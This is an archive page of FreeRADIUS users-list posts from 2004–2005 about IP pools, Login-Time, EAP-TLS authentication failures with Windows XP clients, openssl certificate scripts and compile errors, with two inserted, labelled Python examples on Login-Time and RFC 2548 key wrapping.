exclude certain IP address in the IP Pool

2005-01-18 Thread Lara Adianto
Hi,

I'm wondering whether we can exclude certain IP
addresses from an IP POOL to be assigned to the client
?

for example, the ippool in radiusd.conf has been
defined as following:
range-start = 192.168.167.90
range-stop = 192.168.167.100

This means that IP address between 192.168.167.90 to
192.168.167.100 can be assigned to a client. However,
we wish to exclude IP address 192.168.167.94.

Can we do so ?

Thank you,
lara

=

 
La vie, voyez-vous, ca n'est jamais si bon ni si mauvais qu'on croit
- Guy 
de Maupassant -





- 
List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html


Login-Time Attribute

2005-01-17 Thread Lara Adianto
Hi List,

How does FreeRadius handle Login-Time attribute...?
In the README of FreeRadius, it's written:

 "Radiusd calculates the number of seconds left in the time span, and sets the Session-Timeout to that number of seconds. So if someones Login-Time is "Al0800-1800" and she logs in at 17:30, Session-Timeout is set to 1800 seconds so that she is kicked off at 18:00."
Does it mean FreeRadius reads the Login-Time attribute in the users file, then calculates the time left based on the current time and sets the value in the Session-Timeout attribute ? If that's the case, what happens if the users file contains both a Login-Time attribute and a Session-Timeout attribute ?

I read somewhere that login-time is an RFC defined attribute...which RFC defines it ? I can't find any info on the net

Thanks for clearing my doubts,
Lara
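The README paragraph quoted in the post describes a computation. The following is an added example in Python (not code from the FreeRADIUS server) that carries it out for the subset of the Login-Time syntax visible on this page: two-letter day names, Wk for Monday to Friday, Al for every day, HHMM-HHMM ranges, and several ranges joined with "|" or ","; it does not attempt the rest of radiusd's time-string syntax. Ranges that cross midnight are handled. What to do when the reply already carries a Session-Timeout is a choice made by this example (keep the smaller value), not a statement about what radiusd does.

```python
# Added example, not code from the FreeRADIUS server: the Login-Time to
# Session-Timeout computation for the syntax subset shown on the page.
import re
from datetime import datetime

DAY_INDEX = {"Su": 0, "Mo": 1, "Tu": 2, "We": 3, "Th": 4, "Fr": 5, "Sa": 6}
MINUTES_PER_DAY = 24 * 60
MINUTES_PER_WEEK = 7 * MINUTES_PER_DAY
TOKEN = re.compile(r"^([A-Za-z]*)(\d{2})(\d{2})-(\d{2})(\d{2})$")


def parse_time(text):
    """'2005-01-17 17:30:00' -> datetime (helper for the examples below)."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def expand_days(daystr):
    """'MoWe' -> {1, 3}; 'Wk' -> Monday..Friday; '' or 'Al' -> every day."""
    if daystr in ("", "Al", "Any"):
        return set(range(7))
    days = set()
    for i in range(0, len(daystr), 2):
        name = daystr[i:i + 2]
        if name == "Wk":
            days.update(range(1, 6))
        elif name in DAY_INDEX:
            days.add(DAY_INDEX[name])
        else:
            raise ValueError("unknown day name %r in Login-Time" % name)
    return days


def parse_login_time(spec):
    """Per-minute bitmap of the week: True where the user may be logged in."""
    allowed = [False] * MINUTES_PER_WEEK
    for token in re.split(r"[|,]", spec):
        token = token.strip()
        if not token:
            continue
        m = TOKEN.match(token)
        if not m:
            raise ValueError("cannot parse Login-Time token %r" % token)
        daystr, sh, sm, eh, em = m.groups()
        start, end = int(sh) * 60 + int(sm), int(eh) * 60 + int(em)
        # "2200-0200" runs past midnight into the following day
        length = end - start if end > start else end - start + MINUTES_PER_DAY
        for day in expand_days(daystr):
            first = day * MINUTES_PER_DAY + start
            for i in range(length):
                allowed[(first + i) % MINUTES_PER_WEEK] = True
    return allowed


def seconds_left(spec, now):
    """Seconds until the current Login-Time window closes.

    0 means login is not permitted right now; -1 means no restriction
    (every minute of the week is allowed), so no Session-Timeout is derived.
    """
    allowed = parse_login_time(spec)
    if all(allowed):
        return -1
    day = (now.weekday() + 1) % 7           # Python counts Monday as 0; we want Sunday
    idx = day * MINUTES_PER_DAY + now.hour * 60 + now.minute
    if not allowed[idx]:
        return 0
    n = 0
    while allowed[(idx + n) % MINUTES_PER_WEEK]:
        n += 1
    return n * 60 - now.second


def apply_login_time(reply, spec, now):
    """Derive Session-Timeout for a reply (a dict of attribute -> value).

    Returns None when the login must be rejected. If the reply already holds a
    Session-Timeout, this example keeps whichever value is smaller; that is a
    policy chosen here, not a description of radiusd's own code.
    """
    left = seconds_left(spec, now)
    if left == 0:
        return None
    if left > 0 and (reply.get("Session-Timeout") is None or reply["Session-Timeout"] > left):
        reply = dict(reply, **{"Session-Timeout": left})
    return reply


if __name__ == "__main__":
    t = parse_time("2005-01-17 17:30:00")        # a Monday, as in the README example
    print(seconds_left("Al0800-1800", t))         # 1800
    print(apply_login_time({"Session-Timeout": 3600}, "Al0800-1800", t))
```

With "Al0800-1800" and a login at 17:30 the function returns 1800, matching the README's sentence; on a Saturday under "Wk0800-1800" it returns 0, which is the case a server must turn into a reject rather than a zero-second timeout.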

Re: eap-tls auth: access accept is sent but xp client keeps resending access-req

2004-11-19 Thread Lara Adianto

I still can't solve this problem.
To all people who have successfully configured EAP/TLS and FreeRadius, how did you generate the cert ? Through certificate authority in windows ? or openssl in linux ?
Is it necessary for the windows XP supplicant to be able to contact the domain of the cert ?

I tried with D-Link-650+ wireless card and eapol.log shows:

[3092] 12:43:31:912: ProcessReceivedPacket: != EAP_Packet
[3092] 12:43:31:912: ProcessReceivedPacket: == EAPOL_Key
[3092] 12:43:31:912: FSMKeyReceive entered for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport
[3092] 12:43:31:912: ElKeyReceiveRC4 entered for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport
[3092] 12:43:31:912: KeyLength = 13, KeyIndex = 131
[3092] 12:43:31:912: ElKeyReceiveRC4: Signature in Key Desc does not match
[3092] 12:43:31:912: ElKeyReceiveRC4 completed for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport
[3092] 12:43:31:912: FSMKeyReceive completed for port D-Link AirPlus DWL-650+ Wireless Cardbus Adapter - Packet Scheduler Miniport
[3092] 12:43:31:912: ProcessReceivedPacket: STATE_AUTHENTICATED
[3092] 12:43:31:912: ProcessReceivedPacket: Reposting buffer on port {CCB07A09-4681-4980-A6E7-6AEE66016B3B}
[3092] 12:43:31:912: ElReadFromPort entered
[3092] 12:43:31:912: ElReadFromPort: pPCB = 03247188, RefCnt = 3
[3092] 12:43:31:912: ProcessReceivedPacket: pPCB= 03247188, RefCnt = 3
[3092] 12:43:31:912: ProcessReceivedPacket exit
[3092] 12:43:36:929: ElTimeoutCallbackRoutine entered
[3092] 12:43:36:929: EAPOL-Key for transmit key *NOT* received within 5 seconds in AUTHENTICATED state
[3092] 12:43:36:929: EAPOL Failure: Fail Count = 2
[3092] 12:43:36:929: ElVerifyEAPOLKeyReceived: Calling ElZeroConfigNotify: failcount=2, prevauthtype=1, type=(2)
[3092] 12:43:36:929: ElVerifyEAPOLKeyReceived: RpcCmdInterface[12] SUCCEEDed
[3092] 12:43:36:929: ElZeroConfigNotify: Handle=(13), failcount=(2), lastauthtype=(1)
I feel that the following lines (taken from the above log) indicate that something's not right, but I'm not sure what they mean... maybe somebody can help me ?

[3092] 12:43:31:912: ElKeyReceiveRC4: Signature in Key Desc does not match
[3092] 12:43:36:929: EAPOL-Key for transmit key *NOT* received within 5 seconds in AUTHENTICATED state
Thanks,
lara

Lara Adianto [EMAIL PROTECTED] wrote:
  The log file of freeradius shows that the authentication is successful, with access-accept being sent. I use tcpdump to confirm that access-accept is indeed sent and received by the access-point. However, after about 1 minute, the client will resend an access-request. And this keeps repeating...

 Ok...

  The only error log I can suspect from event viewer is this:
  ... Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted. Enrollment will not be performed. For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.

 That looks like the problem to me. Fix that, and the machine should stay on the network. And no, there's nothing you can do to FreeRADIUS to fix that problem.

 Alan DeKok.

Lara Adianto [EMAIL PROTECTED] wrote:

Hi list,

I have a strange problem with EAP/TLS authentication.

I have done the setup with the guide from Ken Roser's howto provided in freeradius site:
- The client is XP, wireless card: linksys WPC54G
- The freeradius server is installed in linux
- The access point is linksys WRT54G
- The certificates (with enhanced key usage for server and client authentication) for server and client are generated using openssl installed in freeradius server

The log file of freeradius shows that the authentication is successful, with access-accept being sent. I use tcpdump to confirm that access-accept is indeed sent and received by the access-point. However, after about 1 minute, the client will resend an access-request. And this keeps repeating... and the client seems to fail the authentication though the radius server keeps sending access-accept:


Sending Access-Accept of id 23 to 192.168.168.60:1232
MS-MPPE-Recv-Key = 0xeb0e81327b50c60eb6bd54a9a02da65bcc87136bfdf0d0708f9be01db4078473
MS-MPPE-Send-Key = 0xb01787160d97e7cf0ac614e56479ee7870a6068f142a2279b71e5d3894225f72
EAP-Message = 0x03150004
Message-Authenticator = 0x

No session-timeout attribute is sent though, like in ken roser's log file. Could this be a problem ?

The eapol.log shows : [1648] 15:45:13:583: ElWriteCompletionRoutine sent out 0 bytes with error -1073741823, but I'm not quite sure what it means. 

The only error log I can suspect from event viewer is this:

Event Type: Error
Event Source: AutoEnrollment
Event Category: None
Event ID: 15
Date: 17-Nov-04
Time: 7:50:04 PM
User: N/A
Computer: LAR4S
Description: Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does

eap-tls auth: access accept is sent but xp client keeps resending access-req

2004-11-17 Thread Lara Adianto
Hi list,

I have a strange problem with EAP/TLS authentication.

I have done the setup with the guide from Ken Roser's howto provided in freeradius site:
- The client is XP, wireless card: linksys WPC54G
- The freeradius server is installed in linux
- The access point is linksys WRT54G
- The certificates (with enhanced key usage for server and client authentication) for server and client are generated using openssl installed in freeradius server

The log file of freeradius shows that the authentication is successful, with access-accept being sent. I use tcpdump to confirm that access-accept is indeed sent and received by the access-point. However, after about 1 minute, the client will resend an access-request. And this keeps repeating... and the client seems to fail the authentication though the radius server keeps sending access-accept:


Sending Access-Accept of id 23 to 192.168.168.60:1232
MS-MPPE-Recv-Key = 0xeb0e81327b50c60eb6bd54a9a02da65bcc87136bfdf0d0708f9be01db4078473
MS-MPPE-Send-Key = 0xb01787160d97e7cf0ac614e56479ee7870a6068f142a2279b71e5d3894225f72
EAP-Message = 0x03150004
Message-Authenticator = 0x

No session-timeout attribute is sent though, like in ken roser's log file. Could this be a problem ?

The eapol.log shows : [1648] 15:45:13:583: ElWriteCompletionRoutine sent out 0 bytes with error -1073741823, but I'm not quite sure what it means. 

The only error log I can suspect from event viewer is this:

Event Type: Error
Event Source: AutoEnrollment
Event Category: None
Event ID: 15
Date: 17-Nov-04
Time: 7:50:04 PM
User: N/A
Computer: LAR4S
Description: Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted. Enrollment will not be performed.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Anyone can help me ? please ? I really need to solve this ASAP...

Thank you,
Lara

eapol.log:
[2952] 15:45:09:848: ElMediaEventsHandler entered -- EventType=6
[2952] 15:45:09:868: ElMediaEventsHandler: Calling ElMediaSenseCallback
[2952] 15:45:09:868: ElMediaSenseCallback: Entered
[2952] 15:45:09:868: ElMediaSenseCallbackWorker: For interface (Wireless-G Notebook Adapter with SpeedBooster), GUID ({CCB5C4C2-79EB-4414-A58B-6382051C13F6}), length of block = 90
[2952] 15:45:09:868: ElMediaSenseCallbackWorker: Callback for sense disconnect
[2952] 15:45:09:868: FSMDisconnected entered for port Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport
[2952] 15:45:09:868: Setting state DISCONNECTED for port Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport
[2952] 15:45:09:868: FSMDisconnected completed for port Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport
[2952] 15:45:09:868: ElMediaSenseCallbackWorker: Port marked disconnected Wireless-G Notebook Adapter with SpeedBooster
[2952] 15:45:09:868: ElMediaSenseCallbackWorker: processed, RetCode = 0
[1648] 15:45:13:583: ElMediaEventsHandler entered -- EventType=7
[1648] 15:45:13:583: ElMediaEventsHandler: Calling ElZeroConfigEvent
[1648] 15:45:13:583: ElGetInterfaceParams: SsidLength=7, Found EapTypeId=13, SSIDLen=7
[1648] 15:45:13:583: ElEnumAndOpenInterfaces: DeviceDesc = , GUID = {CCB5C4C2-79EB-4414-A58B-6382051C13F6}
[1648] 15:45:13:583: ElNdisuioEnumerateInterfaces: Opening handle
[1648] 15:45:13:583: NdisuioEnumerateInterfaces: NDISUIO bound to: (0) \DEVICE\{1A918A7C-F63C-4EF3-B6AD-12C1DFC6A4A1} - Realtek RTL8139 Family PCI Fast Ethernet NIC - Packet Scheduler Miniport
[1648] 15:45:13:583: NdisuioEnumerateInterfaces: NDISUIO bound to: (1) \DEVICE\{CCB5C4C2-79EB-4414-A58B-6382051C13F6} - Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport
[1648] 15:45:13:583: ElNdisuioEnumerateInterfaces: DeviceIoControl IOCTL_NDISUIO_QUERY_BINDING has no more entries
[1648] 15:45:13:583: Device: \DEVICE\{1A918A7C-F63C-4EF3-B6AD-12C1DFC6A4A1}
[1648] 15:45:13:583: Description: Realtek RTL8139 Family PCI Fast Ethernet NIC - Packet Scheduler Miniport
[1648] 15:45:13:583: Device: \DEVICE\{CCB5C4C2-79EB-4414-A58B-6382051C13F6}
[1648] 15:45:13:583: Description: Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport
[1648] 15:45:13:583: ElEnumAndOpenInterfaces: Found interface after enumeration \DEVICE\{CCB5C4C2-79EB-4414-A58B-6382051C13F6}
[1648] 15:45:13:583: ElEnumAndOpenInterfaces: Found PCB already existing for interface
[1648] 15:45:13:583: ElCreatePort: Entered for Handle=(0D8C), GUID=({CCB5C4C2-79EB-4414-A58B-6382051C13F6}), Name=(Wireless-G Notebook Adapter with SpeedBooster - Packet Scheduler Miniport), ZCId=(1150), UserData=(033B961C) Notification=4
[1648] 15:45:13:583: ElGetInterfaceNdisStatistics: pwszDeviceInterfaceName = (\Device\{CCB5C4C2-79EB-4414-A58B-6382051C13F6})
[1648] 15:45:13:583: ElCreatePort: PCB found for {CCB5C4C2-79EB-4414-A58B-6382051C13F6}
[1648] 15:45:13:583: ElReStartPort: Entered:
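The MS-MPPE-Recv-Key and MS-MPPE-Send-Key values in the Access-Accept shown in this thread are the 32-byte plaintext keys as the debug output prints them; on the wire each one is wrapped by the procedure of RFC 2548 section 2.4 under the RADIUS shared secret and the Request Authenticator, and the access point unwraps them to obtain the material it uses for the EAPOL-Key exchange that the eapol.log shows failing. The following added example (Python; not FreeRADIUS, Microsoft or Linksys code) performs that wrapping and unwrapping on both sides using the two keys from the log; the shared secret, the Request Authenticator and the salts are constructed for the demo.

```python
# Added example (not FreeRADIUS or Microsoft code): RFC 2548 2.4 key wrapping
# for MS-MPPE-Send-Key / MS-MPPE-Recv-Key, as the server performs it and as the
# access point undoes it. The two keys are the ones from the radiusd -X output
# in the thread; secret, Request Authenticator and salts are constructed.
import hashlib
import os
import struct

VENDOR_SPECIFIC = 26
MICROSOFT_VENDOR_ID = 311
MS_MPPE_SEND_KEY, MS_MPPE_RECV_KEY = 16, 17     # Vendor-Type numbers, RFC 2548

RECV_KEY = bytes.fromhex("eb0e81327b50c60eb6bd54a9a02da65bcc87136bfdf0d0708f9be01db4078473")
SEND_KEY = bytes.fromhex("b01787160d97e7cf0ac614e56479ee7870a6068f142a2279b71e5d3894225f72")
SECRET = b"testing123"                                            # constructed
REQUEST_AUTH = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")  # constructed


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def mppe_wrap(key, secret, request_auth, salt):
    """RFC 2548 2.4.2: P = len || key || zero pad to a multiple of 16;
    C(1) = P(1) xor MD5(S || RequestAuth || salt), C(i) = P(i) xor MD5(S || C(i-1)).
    Returns salt || C(1) || ... || C(n)."""
    if len(salt) != 2 or not salt[0] & 0x80:
        raise ValueError("salt must be two bytes with the high bit set")
    plain = bytes([len(key)]) + key
    plain += b"\x00" * (-len(plain) % 16)
    out, prev = b"", request_auth + salt
    for i in range(0, len(plain), 16):
        block = _xor(plain[i:i + 16], hashlib.md5(secret + prev).digest())
        out, prev = out + block, block
    return salt + out


def mppe_unwrap(value, secret, request_auth):
    """Reverse of mppe_wrap. Returns None for a malformed value; a wrong secret
    gives garbage that usually, but not always, fails the length-byte check."""
    salt, cipher = value[:2], value[2:]
    if len(salt) != 2 or not salt[0] & 0x80 or not cipher or len(cipher) % 16:
        return None
    plain, prev = b"", request_auth + salt
    for i in range(0, len(cipher), 16):
        plain += _xor(cipher[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = cipher[i:i + 16]
    n = plain[0]
    if n == 0 or n > len(plain) - 1:
        return None
    return plain[1:1 + n]


def ms_vsa(vendor_type, value):
    """Microsoft sub-attribute carried in a RADIUS Vendor-Specific (type 26) attribute."""
    inner = bytes([vendor_type, 2 + len(value)]) + value
    return bytes([VENDOR_SPECIFIC, 6 + len(inner)]) + struct.pack("!I", MICROSOFT_VENDOR_ID) + inner


def parse_ms_vsa(attr):
    """Return (vendor_type, value) for a Microsoft VSA, else None."""
    if len(attr) < 8 or attr[0] != VENDOR_SPECIFIC or attr[1] != len(attr):
        return None
    if struct.unpack("!I", attr[2:6])[0] != MICROSOFT_VENDOR_ID:
        return None
    vendor_type, vendor_len = attr[6], attr[7]
    return vendor_type, attr[8:6 + vendor_len]


def build_mppe_attrs(send_key, recv_key, secret, request_auth, rng=os.urandom):
    """Server side: the two attributes for an Access-Accept. RFC 2548 requires
    the salt to be unique within a packet, so the second is redrawn on collision."""
    def salt():
        return bytes([rng(1)[0] | 0x80]) + rng(1)
    s1 = salt()
    s2 = salt()
    while s2 == s1:
        s2 = salt()
    return [ms_vsa(MS_MPPE_SEND_KEY, mppe_wrap(send_key, secret, request_auth, s1)),
            ms_vsa(MS_MPPE_RECV_KEY, mppe_wrap(recv_key, secret, request_auth, s2))]


def extract_mppe_keys(attrs, secret, request_auth):
    """NAS side: (send_key, recv_key) recovered from an Access-Accept's attributes."""
    found = {}
    for attr in attrs:
        parsed = parse_ms_vsa(attr)
        if parsed and parsed[0] in (MS_MPPE_SEND_KEY, MS_MPPE_RECV_KEY):
            found[parsed[0]] = mppe_unwrap(parsed[1], secret, request_auth)
    return found.get(MS_MPPE_SEND_KEY), found.get(MS_MPPE_RECV_KEY)


if __name__ == "__main__":
    attrs = build_mppe_attrs(SEND_KEY, RECV_KEY, SECRET, REQUEST_AUTH)
    print(len(attrs[0]), extract_mppe_keys(attrs, SECRET, REQUEST_AUTH) == (SEND_KEY, RECV_KEY))
```

A 32-byte key becomes 1 + 32 = 33 bytes of plaintext, padded to 48, plus the 2-byte salt: 50 bytes inside a 58-byte Vendor-Specific attribute. The NAS can only recover the key if it holds the same shared secret and saw the same Request Authenticator, which is why a NAS that authenticates fine on the RADIUS side but has no usable key for EAPOL is worth checking from this angle.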

doubt about EAP/TLS mechanism

2004-10-12 Thread Lara Adianto
Hi,

Using EAP/TLS authentication, I noticed that even if the user doesn't exist in the users file, the EAP/TLS authentication still proceeds and the key exchange still occurs; access accept is also sent together with MS-MPPE-Recv-Key and MS-MPPE-Send-Key.

rlm_realm: No '@' in User-Name = "lara", looking up realm NULL
rlm_realm: No such realm "NULL"
modcall[authorize]: module "suffix" returns noop for request 3
modcall[authorize]: module "files" returns notfound for request 3 -- user lara not found

Is there any impact of this on the authentication process ? What's the purpose of checking users file in the EAP/TLS authentication ?

Regards,
Lara

Re: rlm_eap_tls: invalid ack received

2004-10-07 Thread Lara Adianto
I've tried those scripts, also scripts from Raymond McKay and Ken Roser, but it seems that the client certs generated from those scripts have a problem when installed in the XP machine. It says: the integrity of this certificate cannot be guaranteed. The certificate may be corrupted or may have been altered. The root cert is installed properly, and is valid ! I have no idea what caused the problem

So, I use my own script to generate the certs, which is okay, when it's installed in xp:

*CA*
/usr/local/openssl/bin/openssl req -new -x509 -keyout cakey.pem -out ca_request.pem -days 888
/usr/local/openssl/bin/openssl pkcs12 -export -in ca_request.pem -inkey cakey.pem -out ca.p12 -cacerts
/usr/local/openssl/bin/openssl pkcs12 -in ca.p12 -out ca.pem

*Client*
/usr/local/openssl/bin/openssl req -new -keyout clientkey.pem -out client_request.pem -days 888
# request and key concatenated into one file (the '>' and '>>' redirections were lost in the archive)
cat client_request.pem > client_new.pem
cat clientkey.pem >> client_new.pem
# 'openssl ca' signs with the CA key and certificate named in openssl.cnf (demoCA/ by default)
/usr/local/openssl/bin/openssl ca -policy policy_anything -out client_cert.pem -extensions xpclient_ext -extfile /usr/local/openssl/ssl/misc/xpextensions -infiles client_new.pem
/usr/local/openssl/bin/openssl pkcs12 -export -in client_cert.pem -inkey clientkey.pem -out client.p12 -clcerts

*Server*
/usr/local/openssl/bin/openssl req -new -keyout serverkey.pem -out server_request.pem -days 888
cat server_request.pem > server_new.pem
cat serverkey.pem >> server_new.pem
/usr/local/openssl/bin/openssl ca -policy policy_anything -out server_cert.pem -extensions xpserver_ext -extfile /usr/local/openssl/ssl/misc/xpextensions -infiles server_new.pem
/usr/local/openssl/bin/openssl pkcs12 -export -in server_cert.pem -inkey serverkey.pem -out server.p12 -clcerts
With the certs generated from the above script, eap/tls auth can be initiated, though it failed with the "Invalid ACK received" ...

I just need to understand what caused this problem ... I've traced the code, seems that there's something wrong with the packet from client ... Can somebody shed a light on what happens ?

is it the cert that caused the problem ? fragment size ? I've tried fragment size 1024, 512, 256 ... but problem's still there...

I've tried disabling "validate server certificate", however this time I got another problem:
26431:error:140890B2:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned:s3_srvr.c:2010:

Thanks,
lara
Alan DeKok [EMAIL PROTECTED] wrote:
  Lara Adianto <[EMAIL PROTECTED]> wrote:
   According to the posting, the problem lies in the server cert, that the client fails to validate, hence client will return invalid ack. My question is how can one make sure that the cert generated is valid ?

  scripts/CA.certs

  Run it, and it will generate some test certificates.

  Alan DeKok.

rlm_eap_tls: invalid ack received

2004-10-06 Thread Lara Adianto
Hi list,
I'm stuck with the following problem of EAP/TLS authentication:
modcall: entering group authenticate for request 3
rlm_eap: EAP packet type notification id 4 length 6
rlm_eap: EAP Start not found
rlm_eap: Request found, released from the list
rlm_eap: EAP_TYPE - tls
auth: type "EAP"
modcall: entering group authenticate for request 3
rlm_eap: EAP packet type notification id 4 length 6
rlm_eap: EAP Start not found
rlm_eap: Request found, released from the list
rlm_eap: EAP_TYPE - tls
rlm_eap: processing type tls
rlm_eap_tls: Authenticate
rlm_eap_tls: Received EAP-TLS ACK message
rlm_eap_tls: Invalid ACK received
modcall[authenticate]: module "eap" returns invalid for request 3
modcall: group authenticate returns invalid for request 3
auth: Failed to validate the user.
This problem occurs in the middle of handshaking process...
I found an old posting: http://www.mail-archive.com/[EMAIL PROTECTED]/msg11208.html, which is similar to mine...
According to the posting, the problem lies in the server cert, thatthe client fails to validate, hence client will return invalid ack.
My question is how can one make sure that the cert generated is valid ?
and does anyone have the script from Raymond McKay (http://www.impossiblereflex.com/8021x/eap-tls-HOWTO.htm#6) ? The link doesn't exist anymore
Thanks.
lara

Re: rlm_eap_tls compilation problem

2004-09-30 Thread Lara Adianto
Problem is solved. It's the problem with the shared library include.

Thanks,
lara
Alan DeKok [EMAIL PROTECTED] wrote:
  Lara Adianto <[EMAIL PROTECTED]> wrote:
   Anyway, I've tried using freeradius-1.0.1 like what you have suggested, this time it complained about openssl/des.h:
   Making static dynamic in rlm_x99_token...

  That module doesn't currently have a maintainer. If you're not using it, delete the directory containing the module, and everything else will still work.

  Alan DeKok.

rlm_eap_tls, no response from server

2004-09-30 Thread Lara Adianto

Hi all,

I have a problem with rlm_eap_tls. The radius server doesn't seem to accept the access request from the access point, though the log file in the access point indicates that it has indeed sent an access request. 

First of all,
$ ldd radiusd
	libcrypt.so.1 => /lib/libcrypt.so.1 (0x4001b000)
	libradius-0.9.3.so => /usr/local/lib/libradius-0.9.3.so (0x40048000)
	libltdl.so.3 => /usr/local/lib/libltdl.so.3 (0x4017f000)
	libdl.so.2 => /lib/libdl.so.2 (0x40186000)
	libnsl.so.1 => /lib/libnsl.so.1 (0x4018a000)
	libresolv.so.2 => /lib/libresolv.so.2 (0x401a1000)
	libpthread.so.0 => /lib/i686/libpthread.so.0 (0x401b3000)
	libc.so.6 => /lib/i686/libc.so.6 (0x401c8000)
	libcryptoki.so => /opt/Eracom/lib/libcryptoki.so (0x40303000)
	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x4000)
	libm.so.6 => /lib/i686/libm.so.6 (0x4031f000)

Is the above correct ?

Secondly, int the log file:
Info: Starting - reading configuration files ...
Error: rlm_eap_tls: conf N ctx stored

Is the above normal ? I read on the previous post that this is normal with freeradius-0.9.3 (I know that freeradius-1.0.1 is out and more stable, but I'm sure that EAP/TLS can work with freeradius-0.9.3)

In http://www.missl.cs.umd.edu/wireless/eaptls/?tag=missl-802-1, it is said that EAP/TLS can only work with SNAP version of openssl-0.9.7. Is this right ?

Thanks for any reply,
lara
Alan DeKok [EMAIL PROTECTED] wrote:
  Lara Adianto <[EMAIL PROTECTED]> wrote:
   Anyway, I've tried using freeradius-1.0.1 like what you have suggested, this time it complained about openssl/des.h:
   Making static dynamic in rlm_x99_token...

  That module doesn't currently have a maintainer. If you're not using it, delete the directory containing the module, and everything else will still work.

  Alan DeKok.

Re: rlm_eap_tls, no response from server

2004-09-30 Thread Lara Adianto
I did run the server in debugging mode. What I meant by the log is the debugging statement from running /radiusd -X -A.

Alan DeKok [EMAIL PROTECTED] wrote:
  Lara Adianto <[EMAIL PROTECTED]> wrote:
   I have a problem with rlm_eap_tls. The radius server doesn't seem to accept the access request from the access point, though the log file in the access point indicates that it has indeed sent an access request.

  I have no idea why you're looking in the log file, rather than running the server in debugging mode, as suggested in the FAQ, README, and daily on this list.

  Go run the server in debugging mode and READ the output.

  Alan DeKok.

rlm_eap_tls compilation problem

2004-09-24 Thread Lara Adianto
Hi,

anybody can help me with the compilation of rlm_eap_tls ?

Freeradius version is 0.9.3, latest-snapshot of openssl: openssl-0.9.7-stable-SNAP-20040923.tar.gz

$ LDFLAGS="-L/usr/local/openssl/lib" CPPFLAGS="-I/usr/local/openssl/include" ./configure --localstatedir=/var --sysconfdir=/etc --prefix=/opt

seems that openssl lib and include files are found:
configuring in ./types/rlm_eap_tls
running /bin/sh ./configure --localstatedir=/var --sysconfdir=/etc --prefix=/opt --enable-ltdl-install --cache-file=../../../../.././config.cache --srcdir=.
loading cache ../../../../.././config.cache
checking for gcc... (cached) gcc
checking whether the C compiler (gcc -g -O2 -D_REENTRANT -D_POSIX_PTHREAD_SEMANTICS -Wall -D_GNU_SOURCE -DNDEBUG -L/usr/local/openssl/lib) works... yes
checking whether the C compiler (gcc -g -O2 -D_REENTRANT -D_POSIX_PTHREAD_SEMANTICS -Wall -D_GNU_SOURCE -DNDEBUG -L/usr/local/openssl/lib) is a cross-compiler... no
checking whether we are using GNU C... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking for openssl/ssl.h... yes
checking for DH_new in -lcrypto... yes
checking for SSL_new in -lssl... yes
checking how to run the C preprocessor... (cached) gcc -E
But compilation failed...
$ ./make

Making static in rlm_eap_tls...
gmake[8]: Entering directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types/rlm_eap_tls'
gcc -g -O2 -D_REENTRANT -D_POSIX_PTHREAD_SEMANTICS -Wall -D_GNU_SOURCE -DNDEBUG -I../../../../include -I../.. -DOPENSSL_NO_KRB5 -c rlm_eap_tls.c -o rlm_eap_tls.o
In file included from rlm_eap_tls.c:27:
eap_tls.h:52:25: openssl/err.h: No such file or directory
eap_tls.h:54:28: openssl/engine.h: No such file or directory
In file included from eap_tls.h:56,
                 from rlm_eap_tls.c:27:
/usr/local/openssl/include/openssl/ssl.h:168:27: openssl/e_os2.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:171:26: openssl/comp.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:174:25: openssl/bio.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:177:26: openssl/x509.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:179:26: openssl/kssl.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:180:31: openssl/safestack.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:181:30: openssl/symhacks.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:316:28: openssl/crypto.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:317:27: openssl/lhash.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:318:28: openssl/buffer.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:319:25: openssl/pem.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:938:26: openssl/ssl2.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:939:26: openssl/ssl3.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:940:71: openssl/tls1.h: No such file or directory
/usr/local/openssl/include/openssl/ssl.h:941:27: openssl/ssl23.h: No such file or directory
gmake[8]: *** [rlm_eap_tls.o] Error 1
gmake[8]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types/rlm_eap_tls'
gmake[7]: *** [common] Error 1
gmake[7]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types'
gmake[6]: *** [static] Error 2
gmake[6]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap/types'
gmake[5]: *** [common] Error 1
gmake[5]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap'
gmake[4]: *** [static] Error 2
gmake[4]: Leaving directory `/usr/local/freeradius-0.9.3/src/modules/rlm_eap'
gmake[3]: *** [common] Error 1
